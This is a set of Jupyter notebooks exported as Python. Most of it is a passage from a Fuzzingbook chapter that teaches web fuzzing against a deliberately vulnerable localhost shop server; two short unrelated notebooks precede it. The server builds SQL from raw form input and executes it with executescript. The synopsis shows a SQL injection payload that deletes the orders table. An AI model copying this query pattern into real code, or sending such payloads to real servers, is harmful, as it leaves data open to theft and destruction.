DDf_star, g_star, Dg_star, delta) P, F, d = stationary_values(lq) 
V_LQ(s) = [1, s]' * P * [1, s] + d V_LQ(s_star) -f_star / (1 - lq.bet) X_LQ(s) = - (F * [1, s])[1] X_LQ(s_star) x_star s_min, s_max = 2, 7 ys = [x_opt, X_LQ.(ss)] title = "Optimal Irrigation Policy" xlabel = "Water Level" ylabel = "Irrigation" labels = ["Chebychev" "L-Q"] plot(ss, ys, xlims=(s_min, s_max), ylims=(0.6, 1.6), title=title, xlabel=xlabel, ylabel=ylabel, label = labels) plot!([s_star], [x_star], m=(7,:star8), label="") lq_shadow_price(s) = -2 * (P * [1, s])[2] ys = [cheb_shadow_prices, lq_shadow_price.(ss)] title = "Shadow Price Function" ylabel = "Price" labels = ["Chebychev" "L-Q"] plot(ss, ys, xlims=(s_min, s_max), ylims=(-0.5, 2.5), title=title, xlabel=xlabel, ylabel=ylabel, label=labels) plot!([s_star], [lq_shadow_price(s_star)], m=(7,:star8), label="") V_new = Array{Float64}(length(ss)) for (s_idx, s) in enumerate(ss) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight ,funeval(C, basis, s - x + epsilon))) opt = optimize(objective, 0, s) V_new[s_idx] = -opt.minimum end Resid = V_new - funeval(C, basis, ss); plot(ss, Resid, yformatter=:scientific)
src/Water_Management.jl.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Rotasjon med komplekse tal # %pylab # %matplotlib inline # e^i\alpha som rotasjon: x = array([0,4,4,5,4,2,2,1,1,0,-1,0,0,NaN,2,2,3,3,NaN,0.5,0.5,1.5,1.5,0.5, NaN,2.5,2.5,3.5,3.5,2.5]) y = array([0,0,6,5,7,7,8,8,7,7,5,6,0,NaN,0,2,2,0,NaN,3,4.5,4.5,3,3,NaN,3,4.5,4.5,3,3]) z = x+1j*y plot(z.real, z.imag) axis('equal') alfa = 2.2 # rotasjonsvinkel rotasjon = exp(1j*alfa) z1 = rotasjon*z plot(z1.real, z1.imag) axis('equal') def rotate(alfa=0): figure(figsize=(4,4)) rot = exp(1j*alfa) z1 = rot*z plot(z1.real, z1.imag) axis((-10,10,-10,10)) import ipywidgets as widgets widgets.interact(rotate, alfa=(0.,2*pi,.1))
Rotasjon.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "slide"} # # Testing Web Applications # # In this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces. We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface. We also show how to conduct systematic attacks on these servers, notably with code and SQL injection. # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} # **Prerequisites** # # * The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb). # * Basic knowledge of HTML and HTTP is required. # * Knowledge of SQL databases is helpful. # + [markdown] slideshow={"slide_type": "slide"} # ## Synopsis # <!-- Automatically generated. Do not edit. --> # # To [use the code provided in this chapter](Importing.ipynb), write # # ```python # >>> from fuzzingbook.WebFuzzer import <identifier> # ``` # # and then make use of the following features. # # # This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it. # # ### Fuzzing Web Forms # # `WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements. 
# # Here's the grammar extracted for our vulnerable Web server: # # ```python # >>> web_form_fuzzer = WebFormFuzzer(httpd_url) # >>> web_form_fuzzer.grammar['<start>'] # ['<action>?<query>'] # >>> web_form_fuzzer.grammar['<action>'] # ['/order'] # >>> web_form_fuzzer.grammar['<query>'] # ['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>'] # ``` # Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form. # # ```python # >>> web_form_fuzzer.fuzz() # '/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit=' # ``` # Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values. # # ### SQL Injection Attacks # # `SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`: # # ```python # >>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders") # >>> sql_fuzzer.fuzz() # "/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit=" # ``` # As you can see, the path to be retrieved contains the payload encoded into one of the form field values. # # `SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it. # # # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} toc-hr-collapsed=false # ## A Web User Interface # # Let us start with a simple example. We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles. In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose. 
For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library. # + [markdown] slideshow={"slide_type": "fragment"} # All of our Web server is defined in a `HTTPRequestHandler`, which, as the name suggests, handles arbitrary Web page requests. # + slideshow={"slide_type": "skip"} from http.server import HTTPServer, BaseHTTPRequestHandler, HTTPStatus # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(BaseHTTPRequestHandler): pass # + [markdown] slideshow={"slide_type": "subslide"} # ### Taking Orders # # For our Web server, we need a number of Web pages: # * We want one page where customers can place an order. # * We want one page where they see their order confirmed. # * Additionally, we need pages display error messages such as "Page Not Found". # + [markdown] slideshow={"slide_type": "fragment"} # We start with the order form. The dictionary `FUZZINGBOOK_SWAG` holds the items that customers can order, together with long descriptions: # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} import bookutils # + slideshow={"slide_type": "subslide"} FUZZINGBOOK_SWAG = { "tshirt": "One FuzzingBook T-Shirt", "drill": "One FuzzingBook Rotary Hammer", "lockset": "One FuzzingBook Lock Set" } # + [markdown] slideshow={"slide_type": "fragment"} # This is the HTML code for the order form. The menu for selecting the swag to be ordered is created dynamically from `FUZZINGBOOK_SWAG`. We omit plenty of details such as precise shipping address, payment, shopping cart, and more. # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} HTML_ORDER_FORM = """ <html><body> <form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong> <p> Yes! 
Please send me at your earliest convenience <select name="item"> """ # (We don't use h2, h3, etc. here as they interfere with the notebook table of contents) for item in FUZZINGBOOK_SWAG: HTML_ORDER_FORM += \ '<option value="{item}">{name}</option>\n'.format(item=item, name=FUZZINGBOOK_SWAG[item]) HTML_ORDER_FORM += """ </select> <br> <table> <tr><td> <label for="name">Name: </label><input type="text" name="name"> </td><td> <label for="email">Email: </label><input type="email" name="email"><br> </td></tr> <tr><td> <label for="city">City: </label><input type="text" name="city"> </td><td> <label for="zip">ZIP Code: </label><input type="number" name="zip"> </tr></tr> </table> <input type="checkbox" name="terms"><label for="terms">I have read the <a href="/terms">terms and conditions</a></label>.<br> <input type="submit" name="submit" value="Place order"> </p> </form> </body></html> """ # + [markdown] slideshow={"slide_type": "subslide"} # This is what the order form looks like: # + slideshow={"slide_type": "skip"} from IPython.display import display # + slideshow={"slide_type": "skip"} from bookutils import HTML # + slideshow={"slide_type": "fragment"} HTML(HTML_ORDER_FORM) # + [markdown] slideshow={"slide_type": "fragment"} # This form is not yet functional, as there is no server behind it; pressing "place order" will lead you to a nonexistent page. # + [markdown] slideshow={"slide_type": "subslide"} toc-hr-collapsed=false # ### Order Confirmation # # Once we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before. 
Here is the HTML and the rendering: # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} HTML_ORDER_RECEIVED = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong> <p id="confirmation"> We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br> A confirmation mail will be sent to {email}. </p> <p> Want more swag? Use our <a href="/">order form</a>! </p> </div> </body></html> """ # + slideshow={"slide_type": "subslide"} HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer", name="<NAME>", email="<EMAIL>", city="Seattle", zip="98104")) # + [markdown] slideshow={"slide_type": "subslide"} # ### Terms and Conditions # # A Web site can only be complete if it has the necessary legalese. This page shows some terms and conditions. # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "subslide"} HTML_TERMS_AND_CONDITIONS = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong> <p> The content of this project is licensed under the <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.</a> </p> <p> To place an order, use our <a href="/">order form</a>. </p> </div> </body></html> """ # + slideshow={"slide_type": "subslide"} HTML(HTML_TERMS_AND_CONDITIONS) # + [markdown] slideshow={"slide_type": "slide"} # ## Storing Orders # + [markdown] slideshow={"slide_type": "fragment"} # To store orders, we make use of a *database*, stored in the file `orders.db`. 
# + slideshow={"slide_type": "skip"} import sqlite3 import os # + slideshow={"slide_type": "fragment"} ORDERS_DB = "orders.db" # + [markdown] slideshow={"slide_type": "fragment"} # To interact with the database, we use *SQL commands*. The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form. # + slideshow={"slide_type": "subslide"} def init_db(): if os.path.exists(ORDERS_DB): os.remove(ORDERS_DB) db_connection = sqlite3.connect(ORDERS_DB) db_connection.execute("DROP TABLE IF EXISTS orders") db_connection.execute("CREATE TABLE orders (item text, name text, email text, city text, zip text)") db_connection.commit() return db_connection # + slideshow={"slide_type": "fragment"} db = init_db() # + [markdown] slideshow={"slide_type": "fragment"} # At this point, the database is still empty: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # We can add entries using the SQL `INSERT` command: # + slideshow={"slide_type": "fragment"} db.execute("INSERT INTO orders " + "VALUES ('lockset', '<NAME>', '<EMAIL>', 'Albuquerque', '87101')") db.commit() # + [markdown] slideshow={"slide_type": "fragment"} # These values are now in the database: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "fragment"} # We can also delete entries from the table again (say, after completion of the order): # + slideshow={"slide_type": "fragment"} db.execute("DELETE FROM orders WHERE name = '<NAME>'") db.commit() # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # ### Handling HTTP Requests # # We have an order form and a database; now we need a Web server which brings it all together. 
The Python `http.server` module provides everything we need to build a simple HTTP server. A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages. # + [markdown] slideshow={"slide_type": "fragment"} # We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages. Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed. All other requests end in a `Page Not Found` message. # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(BaseHTTPRequestHandler): def do_GET(self): try: # print("GET " + self.path) if self.path == "/": self.send_order_form() elif self.path.startswith("/order"): self.handle_order() elif self.path.startswith("/terms"): self.send_terms_and_conditions() else: self.not_found() except Exception: self.internal_server_error() # + [markdown] slideshow={"slide_type": "subslide"} # #### Order Form # # Accessing the home page (i.e. getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above. 
# + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def send_order_form(self): self.send_response(HTTPStatus.OK, "Place your order") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(HTML_ORDER_FORM.encode("utf8")) # + [markdown] slideshow={"slide_type": "fragment"} # Likewise, we can send out the terms and conditions: # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def send_terms_and_conditions(self): self.send_response(HTTPStatus.OK, "Terms and Conditions") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8")) # + [markdown] slideshow={"slide_type": "subslide"} # #### Processing Orders # + [markdown] slideshow={"slide_type": "subslide"} # When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form # # ``` # <hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3 # ``` # # where each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user. Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character. # # If <NAME> <<EMAIL>> from Seattle orders a T-Shirt, this is the URL the browser creates: # # ``` # <hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104 # ``` # + [markdown] slideshow={"slide_type": "subslide"} # When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`. The helper method `get_field_values()` takes `self.path` and returns a dictionary of values. 
# + slideshow={"slide_type": "skip"} import urllib.parse # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def get_field_values(self): # Note: this fails to decode non-ASCII characters properly query_string = urllib.parse.urlparse(self.path).query # fields is { 'item': ['tshirt'], 'name': ['<NAME>'], ...} fields = urllib.parse.parse_qs(query_string, keep_blank_values=True) values = {} for key in fields: values[key] = fields[key][0] return values # + [markdown] slideshow={"slide_type": "subslide"} # The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order. If anything goes wrong, it sends an internal server error. # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def handle_order(self): values = self.get_field_values() self.store_order(values) self.send_order_received(values) # + [markdown] slideshow={"slide_type": "fragment"} # Storing the order makes use of the database connection defined above; we create an SQL command instantiated with the values as extracted from the URL. # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def store_order(self, values): db = sqlite3.connect(ORDERS_DB) # The following should be one line sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values) self.log_message("%s", sql_command) db.executescript(sql_command) db.commit() # + [markdown] slideshow={"slide_type": "fragment"} # After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL. 
# + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def send_order_received(self, values): # Should use html.escape() values["item_name"] = FUZZINGBOOK_SWAG[values["item"]] confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8") self.send_response(HTTPStatus.OK, "Order received") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(confirmation) # + [markdown] slideshow={"slide_type": "subslide"} # #### Other HTTP commands # # Besides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page. In our case, this is always empty. # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def do_HEAD(self): # print("HEAD " + self.path) self.send_response(HTTPStatus.OK) self.send_header("Content-type", "text/html") self.end_headers() # + [markdown] slideshow={"slide_type": "subslide"} # ### Error Handling # # We have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur. # + [markdown] slideshow={"slide_type": "subslide"} # #### Page Not Found # # This page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested. # + slideshow={"slide_type": "fragment"} HTML_NOT_FOUND = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Sorry.</strong> <p> This page does not exist. Try our <a href="/">order form</a> instead. </p> </div> </body></html> """ # + slideshow={"slide_type": "subslide"} HTML(HTML_NOT_FOUND) # + [markdown] slideshow={"slide_type": "fragment"} # The method `not_found()` takes care of sending this out with the appropriate HTTP status code. 
# + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def not_found(self): self.send_response(HTTPStatus.NOT_FOUND, "Not found") self.send_header("Content-type", "text/html") self.end_headers() message = HTML_NOT_FOUND self.wfile.write(message.encode("utf8")) # + [markdown] slideshow={"slide_type": "subslide"} # #### Internal Errors # # This page is shown for any internal errors that might occur. For diagnostic purposes, we have it include the traceback of the failing function. # + slideshow={"slide_type": "subslide"} HTML_INTERNAL_SERVER_ERROR = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Internal Server Error</strong> <p> The server has encountered an internal error. Go to our <a href="/">order form</a>. <pre>{error_message}</pre> </p> </div> </body></html> """ # + slideshow={"slide_type": "fragment"} HTML(HTML_INTERNAL_SERVER_ERROR) # + slideshow={"slide_type": "skip"} import sys import traceback # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def internal_server_error(self): self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error") self.send_header("Content-type", "text/html") self.end_headers() exc = traceback.format_exc() self.log_message("%s", exc.strip()) message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc) self.wfile.write(message.encode("utf8")) # + [markdown] slideshow={"slide_type": "subslide"} # ### Logging # # Our server runs as a separate process in the background, waiting to receive commands at all time. To see what it is doing, we implement a special logging mechanism. The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and in which another process (the notebook) can retrieve them. We use this to pass log messages from the server, which we can then display in the notebook. 
# + slideshow={"slide_type": "skip"} from multiprocessing import Queue # + slideshow={"slide_type": "fragment"} HTTPD_MESSAGE_QUEUE = Queue() # + [markdown] slideshow={"slide_type": "fragment"} # Let us place two messages in the queue: # + slideshow={"slide_type": "fragment"} HTTPD_MESSAGE_QUEUE.put("I am another message") # + slideshow={"slide_type": "fragment"} HTTPD_MESSAGE_QUEUE.put("I am one more message") # + [markdown] slideshow={"slide_type": "fragment"} # To distinguish server messages from other parts of the notebook, we format them specially: # + slideshow={"slide_type": "skip"} from bookutils import rich_output, terminal_escape # + slideshow={"slide_type": "subslide"} def display_httpd_message(message): if rich_output(): display( HTML( '<pre style="background: NavajoWhite;">' + message + "</pre>")) else: print(terminal_escape(message)) # + slideshow={"slide_type": "fragment"} display_httpd_message("I am a httpd server message") # + [markdown] slideshow={"slide_type": "fragment"} # The method `print_httpd_messages()` prints all messages accumulated in the queue so far: # + slideshow={"slide_type": "subslide"} def print_httpd_messages(): while not HTTPD_MESSAGE_QUEUE.empty(): message = HTTPD_MESSAGE_QUEUE.get() display_httpd_message(message) # + slideshow={"slide_type": "skip"} import time # + slideshow={"slide_type": "fragment"} time.sleep(1) print_httpd_messages() # + [markdown] slideshow={"slide_type": "fragment"} # With `clear_httpd_messages()`, we can silently discard all pending messages: # + slideshow={"slide_type": "fragment"} def clear_httpd_messages(): while not HTTPD_MESSAGE_QUEUE.empty(): HTTPD_MESSAGE_QUEUE.get() # + [markdown] slideshow={"slide_type": "fragment"} # The method `log_message()` in the request handler makes use of the queue to store its messages: # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def log_message(self, format, *args): message = ("%s - - [%s] %s\n" % 
(self.address_string(), self.log_date_time_string(), format % args)) HTTPD_MESSAGE_QUEUE.put(message) # + [markdown] slideshow={"slide_type": "fragment"} # In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL. We now extend it such that it also prints out any log messages produced by the server: # + slideshow={"slide_type": "skip"} import requests # + slideshow={"slide_type": "subslide"} def webbrowser(url, mute=False): """Download the http/https resource given by the URL""" import requests # for imports try: r = requests.get(url) contents = r.text finally: if not mute: print_httpd_messages() else: clear_httpd_messages() return contents # + [markdown] slideshow={"slide_type": "subslide"} # ### Running the Server # # After all these definitions, we are now ready to get the Web server up and running. We run the server on the *local host* – that is, the same machine which also runs this notebook. We check for an accessible port and put the resulting URL in the queue created earlier. # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} def run_httpd_forever(handler_class): host = "127.0.0.1" # localhost IP for port in range(8800, 9000): httpd_address = (host, port) try: httpd = HTTPServer(httpd_address, handler_class) break except OSError: continue httpd_url = "http://" + host + ":" + repr(port) HTTPD_MESSAGE_QUEUE.put(httpd_url) httpd.serve_forever() # + [markdown] slideshow={"slide_type": "subslide"} # The function `start_httpd()` starts the server in a separate process, which we start using the `multiprocessing` module. It retrieves its URL from the message queue and returns it, such that we can start talking to the server. 
# + slideshow={"slide_type": "skip"} from multiprocessing import Process # + slideshow={"slide_type": "fragment"} def start_httpd(handler_class=SimpleHTTPRequestHandler): clear_httpd_messages() httpd_process = Process(target=run_httpd_forever, args=(handler_class,)) httpd_process.start() httpd_url = HTTPD_MESSAGE_QUEUE.get() return httpd_process, httpd_url # + [markdown] slideshow={"slide_type": "fragment"} # Let us now start the server and save its URL: # + slideshow={"slide_type": "subslide"} httpd_process, httpd_url = start_httpd() httpd_url # + [markdown] slideshow={"slide_type": "subslide"} # ### Interacting with the Server # # Let us now access the server just created. # + [markdown] slideshow={"slide_type": "subslide"} # #### Direct Browser Access # # If you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL. Simply open the address in `httpd_url` by clicking on the link below. # # **Note**: This only works if you are running the Jupyter notebook server on the local host. # + slideshow={"slide_type": "fragment"} def print_url(url): if rich_output(): display(HTML('<pre><a href="%s">%s</a></pre>' % (url, url))) else: print(terminal_escape(url)) # + slideshow={"slide_type": "subslide"} print_url(httpd_url) # + [markdown] slideshow={"slide_type": "fragment"} # Even more convenient, you may be able to interact directly with the server using the window below. # # **Note**: This only works if you are running the Jupyter notebook server on the local host. 
# + slideshow={"slide_type": "fragment"} HTML('<iframe src="' + httpd_url + '" ' + 'width="100%" height="230"></iframe>') # + [markdown] slideshow={"slide_type": "fragment"} # After interaction, you can retrieve the messages produced by the server: # + slideshow={"slide_type": "subslide"} print_httpd_messages() # + [markdown] slideshow={"slide_type": "fragment"} # We can also see any orders placed in the database: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "fragment"} # And we can clear the order database: # + slideshow={"slide_type": "fragment"} db.execute("DELETE FROM orders") db.commit() # + [markdown] slideshow={"slide_type": "subslide"} # #### Retrieving the Home Page # # Even if our browser cannot directly interact with the server, the _notebook_ can. We can, for instance, retrieve the contents of the home page and display them: # + slideshow={"slide_type": "fragment"} contents = webbrowser(httpd_url) # + slideshow={"slide_type": "fragment"} HTML(contents) # + [markdown] slideshow={"slide_type": "subslide"} # #### Placing Orders # # To test this form, we can generate URLs with orders and have the server process them. # + [markdown] slideshow={"slide_type": "fragment"} # The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order. # + slideshow={"slide_type": "skip"} from urllib.parse import urljoin, urlsplit # + slideshow={"slide_type": "fragment"} urljoin(httpd_url, "/order?foo=bar") # + [markdown] slideshow={"slide_type": "fragment"} # With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form. 
Sending this URL to the browser effectively places the order, as we can see in the server log produced: # + slideshow={"slide_type": "subslide"} contents = webbrowser(urljoin(httpd_url, "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104")) # + [markdown] slideshow={"slide_type": "fragment"} # The web page returned confirms the order: # + slideshow={"slide_type": "fragment"} HTML(contents) # + [markdown] slideshow={"slide_type": "fragment"} # And the order is in the database, too: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # #### Error Messages # # We can also test whether the server correctly responds to invalid requests. Nonexistent pages, for instance, are correctly handled: # + slideshow={"slide_type": "fragment"} HTML(webbrowser(urljoin(httpd_url, "/some/other/path"))) # + [markdown] slideshow={"slide_type": "fragment"} # You may remember we also have a page for internal server errors. Can we get the server to produce this page? To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter. # + [markdown] slideshow={"slide_type": "slide"} # ## Fuzzing Input Forms # # After setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values. # + [markdown] slideshow={"slide_type": "subslide"} # ### Fuzzing with Expected Values # # Since placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs. It comes with a few sample values for names, email addresses, cities and (random) digits. 
# + [markdown] slideshow={"slide_type": "fragment"} # To make it easier to define strings that become part of a URL, we define the function `cgi_encode()`, taking a string and autmatically encoding it into CGI: # + slideshow={"slide_type": "skip"} import string # + slideshow={"slide_type": "subslide"} def cgi_encode(s, do_not_encode=""): ret = "" for c in s: if (c in string.ascii_letters or c in string.digits or c in "$-_.+!*'()," or c in do_not_encode): ret += c elif c == ' ': ret += '+' else: ret += "%%%02x" % ord(c) return ret # + slideshow={"slide_type": "fragment"} s = cgi_encode('Is "DOW30" down .24%?') s # + [markdown] slideshow={"slide_type": "subslide"} # The optional parameter `do_not_encode` allows us to skip certain characters from encoding. This is useful when encoding grammar rules: # + slideshow={"slide_type": "fragment"} cgi_encode("<string>@<string>", "<>") # + [markdown] slideshow={"slide_type": "fragment"} # `cgi_encode()` is the exact counterpart of the `cgi_decode()` function defined in the [chapter on coverage](Coverage.ipynb): # + slideshow={"slide_type": "skip"} from Coverage import cgi_decode # minor dependency # + slideshow={"slide_type": "fragment"} cgi_decode(s) # + [markdown] slideshow={"slide_type": "fragment"} # Now for the grammar. 
We make use of `cgi_encode()` to encode strings:

# + slideshow={"slide_type": "skip"}
from Grammars import crange, is_valid_grammar, syntax_diagram

# + slideshow={"slide_type": "subslide"}
# Grammar producing valid order URLs; string values are CGI-encoded
# so the expansions can be used verbatim as URL paths.
ORDER_GRAMMAR = {
    "<start>": ["<order>"],
    "<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
    "<item>": ["tshirt", "drill", "lockset"],
    "<name>": [cgi_encode("<NAME>"), cgi_encode("<NAME>")],
    "<email>": [cgi_encode("<EMAIL>"), cgi_encode("<EMAIL>")],
    "<city>": ["Seattle", cgi_encode("New York")],
    "<zip>": ["<digit>" * 5],
    "<digit>": crange('0', '9')
}

# + slideshow={"slide_type": "fragment"}
assert is_valid_grammar(ORDER_GRAMMAR)

# + slideshow={"slide_type": "subslide"}
syntax_diagram(ORDER_GRAMMAR)

# + [markdown] slideshow={"slide_type": "subslide"}
# Using [one of our grammar fuzzers](GrammarFuzzer.ipynb), we can instantiate this grammar and generate URLs:

# + slideshow={"slide_type": "skip"}
from GrammarFuzzer import GrammarFuzzer

# + slideshow={"slide_type": "fragment"}
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]

# + [markdown] slideshow={"slide_type": "fragment"}
# Sending these URLs to the server will have them processed correctly:

# + slideshow={"slide_type": "fragment"}
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))

# + slideshow={"slide_type": "subslide"}
print(db.execute("SELECT * FROM orders").fetchall())

# + [markdown] slideshow={"slide_type": "subslide"}
# ### Fuzzing with Unexpected Values

# + [markdown] slideshow={"slide_type": "fragment"}
# We can now see that the server does a good job when faced with "standard" values. But what happens if we feed it non-standard values? To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL. Our seed (i.e. 
the value to be mutated) comes from the grammar fuzzer:

# + slideshow={"slide_type": "fragment"}
seed = order_fuzzer.fuzz()
seed

# + [markdown] slideshow={"slide_type": "fragment"}
# Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure.

# + slideshow={"slide_type": "skip"}
from MutationFuzzer import MutationFuzzer  # minor dependency

# + slideshow={"slide_type": "subslide"}
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]

# + [markdown] slideshow={"slide_type": "fragment"}
# Let us fuzz a little until we get an internal server error. We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code.

# + slideshow={"slide_type": "subslide"}
# Keep mutating the seed URL until the server reports an internal error;
# `url` then holds the offending request.
while True:
    path = mutate_order_fuzzer.fuzz()
    url = urljoin(httpd_url, path)
    r = requests.get(url)
    if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
        break

# + [markdown] slideshow={"slide_type": "fragment"}
# That didn't take long. Here's the offending URL:

# + slideshow={"slide_type": "fragment"}
url

# + slideshow={"slide_type": "fragment"}
clear_httpd_messages()
HTML(webbrowser(url))

# + [markdown] slideshow={"slide_type": "subslide"}
# How does the URL cause this internal error? 
